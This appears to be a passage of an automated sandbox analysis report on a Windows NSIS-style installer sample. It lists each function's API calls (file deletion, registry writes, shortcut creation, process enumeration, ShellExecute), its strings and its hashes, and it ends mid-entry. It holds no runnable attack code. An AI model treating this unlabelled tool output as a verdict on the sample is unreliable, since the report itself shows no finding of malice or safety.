                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                  • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                                                                  • API String ID: 2035342205-3294556389
                                                                                                                                                  • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                  • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                                                                  • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                                                                  • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                                                                  Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                  • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                  • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                  • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                  • API String ID: 3581403547-784952888
                                                                                                                                                  • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                  • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                  • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                                                                  • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                                                                  Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                                                                  Strings
                                                                                                                                                  • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                  • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                  • API String ID: 542301482-1377821865
                                                                                                                                                  • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                  • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                                                                  • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                                                                  • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                                                                  Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                                  • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                  • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                                                                  • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                                                                  • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                                                                  Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                                                                    • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                                                                  • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                  • API String ID: 20674999-2124804629
                                                                                                                                                  • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                  • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                                                                  • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                                                                  • Instruction Fuzzy Hash: 38919331900219EBDF109FA4CD88AAFBBB8EF44741F11447BE546F6281DB388A51CF68
                                                                                                                                                  Function 004040B8 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040416D
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404181
                                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040419E
                                                                                                                                                  • GetSysColor.USER32(?), ref: 004041AF
                                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041BD
                                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041CB
                                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004041D6
                                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004041E3
                                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004041F2
                                                                                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404124,?), ref: 00403FE1
                                                                                                                                                    • Part of subcall function 00403FCA: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404124,?), ref: 00403FF0
                                                                                                                                                    • Part of subcall function 00403FCA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404124,?), ref: 00404004
                                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040424A
                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404251
                                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0040427E
                                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042C1
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004042CF
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042D2
                                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00462540,00000000,00000000,00000001), ref: 004042E7
                                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004042F3
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004042F6
                                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404325
                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404337
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                  • String ID: @%F$N$open
                                                                                                                                                  • API String ID: 3928313111-3849437375
                                                                                                                                                  • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                  • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                                                                                                                  • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                                                                                                                  • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                                                                                                                  Function 00406A99 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                                                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                    • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                  • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                                                                                                                  • wsprintfA.USER32 ref: 00406B4D
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                                                                                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                                                                                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                  • String ID: F$%s=%s$NUL$[Rename]
                                                                                                                                                  • API String ID: 565278875-1653569448
                                                                                                                                                  • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                  • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                                                                                                                  • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                                                                                                                  • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                                                                                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                  • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                  • String ID: F
                                                                                                                                                  • API String ID: 941294808-1304234792
                                                                                                                                                  • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                  • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                                                                                  • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                                                                                  • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                                                                                  Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                  • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                  Strings
                                                                                                                                                  • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                  • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                  • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                  • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                  • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                  • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2214311364.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2214295825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214329302.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214343443.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.00000000004F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2214444688.0000000000506000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CloseCreateValuewvsprintf
